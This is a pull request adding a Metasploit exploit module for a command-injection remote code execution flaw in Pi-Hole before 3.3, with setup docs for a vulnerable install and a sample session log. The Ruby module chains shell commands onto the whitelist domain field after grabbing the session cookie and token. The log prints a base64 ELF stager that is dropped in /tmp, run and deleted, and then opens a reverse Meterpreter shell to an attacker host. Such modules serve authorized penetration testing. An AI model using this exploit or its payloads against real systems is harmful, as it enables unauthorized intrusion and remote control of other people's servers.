### PR TITLE
Pi-Hole < 3.3 whitelist RCE

### DIFF
--- a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
+++ b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
@@ -42,8 +42,8 @@ will start it successfully.
   2. Start msfconsole
   3. Do: ```use exploit/unix/http/pihole_whitelist_exec```
   4. Do: ```set rhosts```
-  4. Do: ```run```
-  5. You should get a shell.
+  5. Do: ```run```
+  6. You should get a shell.
 
 ## Options
 

--- a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
+++ b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
@@ -13,7 +13,7 @@ with the following commands:
 sudo git clone --depth=1 -b v3.2.1 https://github.com/pi-hole/pi-hole.git /etc/.pihole
 # replace 'git clone' with 'git clone -b v3.2.1'
 sudo nano /etc/.pihole/automated\ install/basic-install.sh
-sudo ./basic-install.sh
+sudo /etc/.pihole/automated\ install/basic-install.sh
 ```
 
 Pi-Hole attempts to install the latest versions of the software.  Modifying the git clone

--- a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
+++ b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
@@ -6,7 +6,7 @@ the domain that is run on the OS.
 
 ### Setup
 
-Install Pi-Hole from source (Pi-Hole 3.2.1)[https://github.com/pi-hole/pi-hole/releases/tag/v3.2.1].
+Install Pi-Hole from source [Pi-Hole 3.2.1](https://github.com/pi-hole/pi-hole/releases/tag/v3.2.1).
 Follow the steps in the `automated install` folder.  Select yes to install the web interface.
 
 This installs the newest web interface.  Install

--- a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
+++ b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md
@@ -6,12 +6,35 @@ the domain that is run on the OS.
 
 ### Setup
 
-Install Pi-Hole from source [Pi-Hole 3.2.1](https://github.com/pi-hole/pi-hole/releases/tag/v3.2.1).
-Follow the steps in the `automated install` folder.  Select yes to install the web interface.
+Install Pi-Hole [Pi-Hole 3.2.1](https://github.com/pi-hole/pi-hole/releases/tag/v3.2.1)
+with the following commands:
 
-This installs the newest web interface.  Install
-[AdminLTE v3.2.1](https://github.com/pi-hole/AdminLTE/releases/tag/v3.2.1) in `/var/www/html/admin`
-instead.
+```
+sudo git clone --depth=1 -b v3.2.1 https://github.com/pi-hole/pi-hole.git /etc/.pihole
+# replace 'git clone' with 'git clone -b v3.2.1'
+sudo nano /etc/.pihole/automated\ install/basic-install.sh
+sudo ./basic-install.sh
+```
+
+Pi-Hole attempts to install the latest versions of the software.  Modifying the git clone
+command will force it to install the old AdminLTE and Pi-Hole versions.  However this
+will make FTL fail to install.
+
+Answer everything with the default.
+
+Lastly, we need to create one file which wasn't made.
+
+```
+sudo touch /etc/pihole/GitHubVersions
+```
+
+This will be enough to make it exploitable, however the dashboard won't fully work since some
+other components were installed which are too new for it to work with.
+
+If you wish to install FTL, follow the [directions](https://docs.pi-hole.net/ftldns/compile/).
+However, when cloning the FTL repo, add the flag `-b v2.13.1` to pull an age appropriate version.
+Also, the service may not install correctly.  However simply running `sudo /usr/bin/pihole-FTL`
+will start it successfully.
 
 ## Verification Steps
 
@@ -23,6 +46,10 @@ instead.
   5. You should get a shell.
 
 ## Options
+
+### Password
+
+Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to change/remove it.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.rb
+++ b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.rb
@@ -1,0 +1,57 @@
+## Vulnerable Application
+
+This exploits a command execution vulnerability in Pi-Hole <= 3.3. When adding a 
+new domain to the whitelist, it is possible to chain a command to 
+the domain that is run on the OS.
+
+### Setup
+
+Install Pi-Hole from source (Pi-Hole 3.2.1)[https://github.com/pi-hole/pi-hole/releases/tag/v3.2.1].
+Follow the steps in the `automated install` folder.  Select yes to install the web interface.
+
+This installs the newest web interface.  Install
+[AdminLTE v3.2.1](https://github.com/pi-hole/AdminLTE/releases/tag/v3.2.1) in `/var/www/html/admin`
+instead.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/unix/http/pihole_whitelist_exec```
+  4. Do: ```set rhosts```
+  4. Do: ```run```
+  5. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### Pi-Hole 3.2.1 with AdminLTE 3.2.1 on Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/unix/http/pihole_whitelist_exec 
+  msf5 exploit(unix/http/pihole_whitelist_exec) > set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  msf5 exploit(unix/http/pihole_whitelist_exec) > set verbose true
+  verbose => true
+  msf5 exploit(unix/http/pihole_whitelist_exec) > run
+  
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  [+] Version Detected: 3.2.1
+  [*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgCgGgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/DaQVx.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/QUFVT' < '/tmp/DaQVx.b64' ; chmod +x '/tmp/QUFVT' ; '/tmp/QUFVT' ; rm -f '/tmp/QUFVT' ; rm -f '/tmp/DaQVx.b64'"]
+  [*] Using cookie: PHPSESSID=j8o7g4m3e30279850hi275mqhk;
+  [*] Using token: OoSESvgJJEWq7mvYBEOJaa/6jyA0GRy56pRZvy93IlU=
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (980808 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:44212) at 2020-05-13 23:25:19 -0400
+  [*] Command Stager progress - 100.00% done (763/763 bytes)
+  
+  meterpreter > getuid
+  Server username: no-user @ ubuntu1804 (uid=33, gid=33, euid=33, egid=33)
+  meterpreter > sysinfo
+  Computer     : 2.2.2.2
+  OS           : Ubuntu 18.04 (Linux 4.15.0-20-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```

--- a/modules/exploits/unix/http/pihole_whitelist_exec.rb
+++ b/modules/exploits/unix/http/pihole_whitelist_exec.rb
@@ -48,8 +48,24 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
+        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/']),
+        OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),
       ]
+    )
+  end
+
+  def login(cookie)
+    vprint_status('Login required, attempting login.')
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'tab' => 'blocklists'
+      },
+      'vars_post' => {
+        'pw' => datastore['PASSWORD']
+      },
+      'method' => 'POST'
     )
   end
 
@@ -69,6 +85,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'l' => 'white'
       }
     )
+
+    # check if we got hit by a login prompt
+    if res && res.body.include?('Sign in to start your session')
+      res = login(cookie)
+    end
+
+    if res && res.body.include?('Sign in to start your session')
+      fail_with(Failure::BadConfig, 'Incorrect Password')
+    end
 
     # <div id="token" hidden>f5al5pNfFj9YOCSdX159tXjttdHUOAuxOJDgwcgnUHs=</div>
     # may also include /
@@ -102,7 +127,9 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
 
-      %r{<b>Web Interface Version\s*</b>\s*v?(?<version>[\d\.]+).*<b>}m =~ res.body
+      # vDev (HEAD, v3.2.1-0-g31dddd8-dirty)
+      # v3.2.1
+      %r{<b>Web Interface Version\s*</b>\s*(vDev \(HEAD, )?v?(?<version>[\d\.]+)\)?.*<b>}m =~ res.body
 
       if version && Gem::Version.new(version) < Gem::Version.new('3.3')
         vprint_good("Version Detected: #{version}")

--- a/modules/exploits/unix/http/pihole_whitelist_exec.rb
+++ b/modules/exploits/unix/http/pihole_whitelist_exec.rb
@@ -1,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Pi-Hole Whitelist OS Command Execution',
+        'Description' => %q{
+          This exploits a command execution vulnerability in Pi-Hole <= 3.3.
+          When adding a new domain to the whitelist, it is possible to chain
+          a command to the domain that is run on the OS.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Denis Andzakovic' # original PoC, discovery
+          ],
+        'References' =>
+          [
+            ['URL', 'https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns']
+          ],
+        'Platform' => ['linux'],
+        'Privileged' => false,
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => 'Apr 15 2018',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # get cookie
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', 'index.php')
+    )
+    cookie = res.get_cookies
+    print_status("Using cookie: #{cookie}")
+
+    # get token
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', 'list.php'),
+      'cookie' => cookie,
+      'vars_get' => {
+        'l' => 'white'
+      }
+    )
+
+    # <div id="token" hidden>f5al5pNfFj9YOCSdX159tXjttdHUOAuxOJDgwcgnUHs=</div>
+    # may also include /
+    %r{div id="token" hidden>(?<token>[\w+=/]+)</div>} =~ res.body
+
+    unless token
+      fail_with(Failure::UnexpectedReply, 'Unable to find token')
+    end
+
+    print_status("Using token: #{token}")
+
+    send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'admin', 'scripts', 'pi-hole', 'php', 'add.php'),
+      'vars_post' => {
+        'domain' => "#{rand_text_alphanumeric(3..5)}.com;#{cmd}",
+        'list' => 'white',
+        'token' => token
+      }
+    })
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
+        'method' => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
+
+      %r{<b>Web Interface Version\s*</b>\s*v?(?<version>[\d\.]+).*<b>}m =~ res.body
+
+      if version && Gem::Version.new(version) < Gem::Version.new('3.3')
+        vprint_good("Version Detected: #{version}")
+        return CheckCode::Appears
+      else
+        vprint_bad("Version Detected: #{version}")
+        return CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    CheckCode::Safe
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    end
+
+    begin
+      execute_cmdstager(flavor: :bourne)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+
+  end
+end


### PR DESCRIPTION
This module exploits a trivial RCE within the domain whitelist feature of pi-hole.  You'll need to install an old version, see the docs for links.  It took several tries to get the old version to install correctly (it REALLY tries to update itself), so follow the directions closely.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/unix/http/pihole_whitelist_exec`
- [x] `set rhosts`
- [x] **Verify** you get a userland shell
- [x] **Document** is good with spelling and gram

